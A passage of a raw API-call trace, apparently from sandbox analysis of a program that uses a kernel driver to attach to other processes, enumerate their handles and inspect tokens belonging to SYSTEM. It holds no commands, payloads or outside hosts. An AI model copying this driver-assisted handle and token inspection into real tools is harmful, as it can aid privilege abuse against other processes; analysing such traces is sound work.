Object=0xffffd000ac0cf378*=0xffffe0006a552090, HandleInformation=0x0) returned 0x0 [0289.973] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.973] PsReleaseProcessExitSynchronization () returned 0x2 [0289.973] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3ffef [0289.973] ObQueryNameString (in: Object=0xffffe0006a552090, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.973] ObfDereferenceObject (Object=0xffffe0006a552090) returned 0x7fe5 [0289.973] IoCompleteRequest () returned 0x0 [0289.973] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.973] PsAcquireProcessExitSynchronization () returned 0x0 [0289.973] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.973] ObReferenceObjectByHandle (in: Handle=0x6c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bd3b40, HandleInformation=0x0) returned 0x0 [0289.973] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.974] PsReleaseProcessExitSynchronization () returned 0x2 [0289.974] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3ffee [0289.974] ObQueryNameString (in: Object=0xffffe00069bd3b40, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.974] ObfDereferenceObject (Object=0xffffe00069bd3b40) returned 0x7ff5 [0289.974] IoCompleteRequest () returned 0x0 [0289.974] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.974] PsAcquireProcessExitSynchronization () returned 0x0 [0289.974] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.974] ObReferenceObjectByHandle (in: Handle=0x6c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bd5f20, HandleInformation=0x0) returned 0x0 [0289.974] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.974] PsReleaseProcessExitSynchronization () returned 0x2 [0289.974] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3ffed [0289.974] ObQueryNameString (in: Object=0xffffe00069a2b060, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.974] ObfDereferenceObject (Object=0xffffe00069bd5f20) returned 0x7ff7 [0289.974] IoCompleteRequest () returned 0x0 [0289.974] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.974] PsAcquireProcessExitSynchronization () returned 0x0 [0289.974] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0289.974] ObReferenceObjectByHandle (in: Handle=0x7f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f5f250, HandleInformation=0x0) returned 0x0 [0289.974] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.974] PsReleaseProcessExitSynchronization () returned 0x2 [0289.974] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x3ffec [0289.974] ObQueryNameString (in: Object=0xffffe00069f5f250, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.974] ObfDereferenceObject (Object=0xffffe00069f5f250) returned 0x7fe0 [0289.974] IoCompleteRequest () returned 0x0 [0289.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d0) returned 0x188 [0289.974] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.974] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069a01680, HandleInformation=0x0) returned 0x0 [0289.974] ObOpenObjectByPointer (in: Object=0xffffe00069a01680, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.974] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x4805c [0289.974] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe000738dc100 | out: TokenHandle=0xffffe000738dc100*=0x18c) returned 0x0 [0289.974] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.974] IoCompleteRequest () returned 0x0 [0289.974] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.974] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.975] CloseHandle (hObject=0x18c) returned 1 [0289.975] CloseHandle (hObject=0x188) returned 1 [0289.975] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.975] PsAcquireProcessExitSynchronization () returned 0x0 [0289.975] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.975] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a7c090, HandleInformation=0x0) returned 0x0 [0289.975] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.975] PsReleaseProcessExitSynchronization () returned 0x2 [0289.975] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x4005a [0289.975] ObQueryNameString (in: Object=0xffffe00069a7c090, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.975] ObfDereferenceObject (Object=0xffffe00069a7c090) returned 0x7fff [0289.975] IoCompleteRequest () returned 0x0 [0289.975] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.975] PsAcquireProcessExitSynchronization () returned 0x0 [0289.975] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.975] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a76ad0, HandleInformation=0x0) returned 0x0 [0289.975] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.975] PsReleaseProcessExitSynchronization () returned 0x2 [0289.975] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40059 [0289.975] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.975] ObfDereferenceObject (Object=0xffffe00069a76ad0) returned 0x7ff1 [0289.975] IoCompleteRequest () returned 0x0 [0289.976] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.976] PsAcquireProcessExitSynchronization () returned 0x0 [0289.976] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.976] ObReferenceObjectByHandle (in: Handle=0x154, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a82ad0, HandleInformation=0x0) returned 0x0 [0289.976] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.976] PsReleaseProcessExitSynchronization () returned 0x2 [0289.976] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40058 [0289.976] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.976] ObfDereferenceObject (Object=0xffffe00069a82ad0) returned 0x7ffc [0289.976] IoCompleteRequest () returned 0x0 [0289.976] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.976] PsAcquireProcessExitSynchronization () returned 0x0 [0289.976] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.976] ObReferenceObjectByHandle (in: Handle=0x1e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069abd860, HandleInformation=0x0) returned 0x0 [0289.976] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.976] PsReleaseProcessExitSynchronization () returned 0x2 [0289.976] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40057 [0289.976] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.976] ObfDereferenceObject (Object=0xffffe00069abd860) returned 0x7fff [0289.976] IoCompleteRequest () returned 0x0 [0289.976] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.976] PsAcquireProcessExitSynchronization () returned 0x0 [0289.976] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.976] ObReferenceObjectByHandle (in: Handle=0x254, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b09990, HandleInformation=0x0) returned 0x0 [0289.976] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.976] PsReleaseProcessExitSynchronization () returned 0x2 [0289.976] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40056 [0289.976] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.976] ObfDereferenceObject (Object=0xffffe00069b09990) returned 0x7fff [0289.976] IoCompleteRequest () returned 0x0 [0289.976] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.976] PsAcquireProcessExitSynchronization () returned 0x0 [0289.976] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.976] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b108b0, HandleInformation=0x0) returned 0x0 [0289.976] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.976] PsReleaseProcessExitSynchronization () returned 0x2 [0289.976] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40055 [0289.976] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.976] ObfDereferenceObject (Object=0xffffe00069b108b0) returned 0x800e [0289.976] IoCompleteRequest () returned 0x0 [0289.976] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.976] PsAcquireProcessExitSynchronization () returned 0x0 [0289.976] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.977] ObReferenceObjectByHandle (in: Handle=0x310, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a9a210, HandleInformation=0x0) returned 0x0 [0289.977] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.977] PsReleaseProcessExitSynchronization () returned 0x2 [0289.977] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40054 [0289.977] ObQueryNameString (in: Object=0xffffe00069a9a210, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.977] ObfDereferenceObject (Object=0xffffe00069a9a210) returned 0x7eaf [0289.977] IoCompleteRequest () returned 0x0 [0289.977] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.977] PsAcquireProcessExitSynchronization () returned 0x0 [0289.977] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.977] ObReferenceObjectByHandle (in: Handle=0x33c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b531f0, HandleInformation=0x0) returned 0x0 [0289.977] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.977] PsReleaseProcessExitSynchronization () returned 0x2 [0289.977] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40053 [0289.977] ObQueryNameString (in: Object=0xffffe00069b531f0, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.977] ObfDereferenceObject (Object=0xffffe00069b531f0) returned 0x7ffd [0289.977] IoCompleteRequest () returned 0x0 [0289.977] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.977] PsAcquireProcessExitSynchronization () returned 0x0 [0289.977] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.977] ObReferenceObjectByHandle (in: Handle=0x368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069be3990, HandleInformation=0x0) returned 0x0 [0289.977] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.977] PsReleaseProcessExitSynchronization () returned 0x2 [0289.977] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40052 [0289.977] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.977] ObfDereferenceObject (Object=0xffffe00069be3990) returned 0x7ffe [0289.977] IoCompleteRequest () returned 0x0 [0289.977] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.977] PsAcquireProcessExitSynchronization () returned 0x0 [0289.977] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.977] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bde090, HandleInformation=0x0) returned 0x0 [0289.977] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.977] PsReleaseProcessExitSynchronization () returned 0x2 [0289.977] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40051 [0289.977] ObQueryNameString (in: Object=0xffffe00069bde090, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.977] ObfDereferenceObject (Object=0xffffe00069bde090) returned 0x800c [0289.977] IoCompleteRequest () returned 0x0 [0289.977] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.977] PsAcquireProcessExitSynchronization () returned 0x0 [0289.977] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.977] ObReferenceObjectByHandle (in: Handle=0x4c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069be9500, HandleInformation=0x0) returned 0x0 [0289.977] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.977] PsReleaseProcessExitSynchronization () returned 0x2 [0289.977] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x40050 [0289.978] ObQueryNameString (in: Object=0xffffe00069be9500, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.978] ObfDereferenceObject (Object=0xffffe00069be9500) returned 0x7ffe [0289.978] IoCompleteRequest () returned 0x0 [0289.978] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.978] PsAcquireProcessExitSynchronization () returned 0x0 [0289.978] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.978] ObReferenceObjectByHandle (in: Handle=0x4c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bef850, HandleInformation=0x0) returned 0x0 [0289.978] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.978] PsReleaseProcessExitSynchronization () returned 0x2 [0289.978] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x4004f [0289.978] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.978] ObfDereferenceObject (Object=0xffffe00069bef850) returned 0x7ffe [0289.978] IoCompleteRequest () returned 0x0 [0289.978] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.978] PsAcquireProcessExitSynchronization () returned 0x0 [0289.978] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.978] ObReferenceObjectByHandle (in: Handle=0x578, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069dc6090, HandleInformation=0x0) returned 0x0 [0289.978] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.978] PsReleaseProcessExitSynchronization () returned 0x2 [0289.978] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x4004e [0289.978] ObQueryNameString (in: Object=0xffffe00069dc6090, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.978] ObfDereferenceObject (Object=0xffffe00069dc6090) returned 0x7ffe [0289.978] IoCompleteRequest () returned 0x0 [0289.978] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.978] PsAcquireProcessExitSynchronization () returned 0x0 [0289.978] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.978] ObReferenceObjectByHandle (in: Handle=0x654, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069dd5090, HandleInformation=0x0) returned 0x0 [0289.978] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.978] PsReleaseProcessExitSynchronization () returned 0x2 [0289.978] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x4004d [0289.978] ObQueryNameString (in: Object=0xffffe00069dd5090, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.978] ObfDereferenceObject (Object=0xffffe00069dd5090) returned 0x7ffe [0289.978] IoCompleteRequest () returned 0x0 [0289.978] PsLookupProcessByProcessId (in: ProcessId=0x4d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.978] PsAcquireProcessExitSynchronization () returned 0x0 [0289.978] KeStackAttachProcess (in: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069a01680, ApcState=0xffffd000ac0cf400) [0289.978] ObReferenceObjectByHandle (in: Handle=0x790, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069de1610, HandleInformation=0x0) returned 0x0 [0289.978] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.978] PsReleaseProcessExitSynchronization () returned 0x2 [0289.978] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x4004c [0289.978] ObQueryNameString (in: Object=0xffffe00069de1610, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.978] ObfDereferenceObject (Object=0xffffe00069de1610) returned 0x7ffe [0289.978] IoCompleteRequest () returned 0x0 [0289.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e0) returned 0x188 [0289.979] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.979] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069ad7840, HandleInformation=0x0) returned 0x0 [0289.979] ObOpenObjectByPointer (in: Object=0xffffe00069ad7840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.979] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x37f95 [0289.979] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe000738dc100 | out: TokenHandle=0xffffe000738dc100*=0x18c) returned 0x0 [0289.979] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.979] IoCompleteRequest () returned 0x0 [0289.979] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.979] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0290.073] CloseHandle (hObject=0x18c) returned 1 [0290.073] CloseHandle (hObject=0x188) returned 1 [0290.073] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.073] PsAcquireProcessExitSynchronization () returned 0x0 [0290.073] KeStackAttachProcess (in: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ad7840, ApcState=0xffffd000ac0cf400) [0290.073] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069ad6b50, HandleInformation=0x0) returned 0x0 [0290.073] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.073] PsReleaseProcessExitSynchronization () returned 0x2 [0290.073] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x2ff93 [0290.073] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.073] ObfDereferenceObject (Object=0xffffe00069ad6b50) returned 0x7ffe [0290.073] IoCompleteRequest () returned 0x0 [0290.073] PsLookupProcessByProcessId (in: ProcessId=0x5e0, Process=0xffffd000ac0cf388 | out: 